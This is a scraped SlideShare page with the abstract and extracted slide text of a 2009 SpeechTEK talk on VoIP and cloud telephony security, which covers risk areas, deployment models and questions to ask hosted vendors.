SpeechTEK 2009: Securing Cloud Telephony Aug2009

1,439 views

Published on

In this talk at SpeechTEK 2009 in New York City, Dan York, discussed:

As voice and self-service applications move increasingly into the cloud and to IP communications, what do you need to be concerned about with regard to the security of hosted solutions? If you grow to trust the cloud, how can you be sure it will be there for you? What protections can you put in place? What backup plans can you establish? What questions should you ask potential hosted/cloud vendors? In this session, security professional Dan York will walk you through the basic risk areas of voice-over-IP security, explain how those relate to both hosted and hybrid configurations and leave you with a concrete list of questions to consider in considering hosted/cloud options.

Published in: Technology, Business
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,439
On SlideShare
0
From Embeds
0
Number of Embeds
115
Actions
Shares
0
Downloads
85
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

SpeechTEK 2009: Securing Cloud Telephony Aug2009

  1. 1. SpeechTEK 2009 Securing Cloud Telephony Dan York, CISSP Director of Conversations, Voxeo Best Practices Chair, VoIP Security Alliance (VOIPSA) dyork@voxeo.com
  2. 2. Security concerns in telephony are not new… Image courtesy of the Computer History Museum
  3. 3. Nor are our attempts to protect against threats… Image courtesy of Mike Sandman – http://www.sandman.com/
  4. 4. Privacy Availability Compliance Confidence Mobility Cost Avoidance Business Continuity
  5. 5. TDM security is relatively simple... PSTN Gateways TDM IVR Switch Physical Voicemail Wiring
  6. 6. VoIP security is more complex Operating Desktop PSTN E-mail Systems PCs Gateways Systems Network Web Firewalls Switches Servers Standards Voice over IVR Wireless Instant IP Devices Messaging Directories Internet Databases Physical Voicemail Wiring
  7. 7. Confidentiality Integrity Availability
  8. 8. Voice Application Diagram HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  9. 9. Voice Transport HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  10. 10. Voice Transport Voice Phone Browser PSTN (on svr) Voice Phone PBX Browser PSTN TDM (on svr) Voice Phone IP-PBX Browser PSTN SIP (on svr) SIP Voice Phone Service Browser PSTN Internet/WAN Provider (on svr) SIP Voice Phone Browser Internet/WAN (on svr) SIP
  11. 11. Voice Transport - SIP Voice Phone Browser PSTN (on svr) Voice Phone PBX Browser PSTN TDM (on svr) Voice Phone IP-PBX Browser PSTN SIP (on svr) SIP Voice Phone Service Browser PSTN Internet/WAN Provider (on svr) SIP Voice Phone Browser Internet/WAN (on svr) SIP
  12. 12. Voice Authentication HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ??? Who are you talking to?
  13. 13. Voice Biometrics Voice Auth Biometrics Svr HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  14. 14. Web Transport HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  15. 15. App/DB Server Transport HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  16. 16. Server Security HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  17. 17. Management Interfaces HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  18. 18. APIs HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  19. 19. Local Storage / Logging HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  20. 20. Call Recording HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  21. 21. Web Interaction - Authentication Web Svr HTTP Voice App/DB Web Phone Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  22. 22. Web Interaction - XSS/Injection Web Input validation? Svr HTTP Voice App/DB Web Phone Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  23. 23. External Interaction HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets ? Java XML ??? App/DB Svr
  24. 24. Moving Into The Cloud
  25. 25. Location - Single network/server HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  26. 26. Location - Distributed HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML
  27. 27. Location - Distributed HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML
  28. 28. Location - Into the cloud HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or PHP perl python CCXML ruby servlets Java XML ???
  29. 29. Location - Distributed/Cloud HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML
  30. 30. Location - Distributed/Cloud HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML
  31. 31. Location - Hybrid HTTP Voice App/DB Web Phone Audio Browser ? (on svr) Svr Svr VoiceXML or CCXML HTTP Voice App/DB Web Browser ? (on svr) Svr Svr VoiceXML or CCXML
  32. 32. Can You Trust The Cloud To Be There?
  33. 33. Location/network questions • What level of network connectivity do you have available? • What kind of availability guarantees / Service Level Agreements (SLAs) do you have in place? • What kind of geographic redundancy is built into your underlying network? • What kind of network redundancy is built into your underlying network? • What kind of physical redundancy is built into your data centers? • What kind of monitoring do you perform? • What kind of scalability is in the cloud computing platform? • What kind of security, both network and physical, is part of the platform? • What kind of security policies and procedures are in place? • What kind of patch management plans? • Will firewall traversal be necessary (for instance, for a SIP trunk) and if so, how? • How scalable is the solution? • Do you have appropriately-trained and available staff?
  34. 34. Distributed Architectures Web App/DB Svr Svr Web App/DB Voice Svr Svr Browser (on svr) Phone Audio App/DB Voice Svr Browser (on svr) MR CP ASR
  35. 35. Geography
  36. 36. Confidentiality Integrity Availability
  37. 37. Thank you! Dan York, CISSP Director of Conversations, Voxeo Best Practices Chair, VoIP Security Alliance (VOIPSA) dyork@voxeo.com

×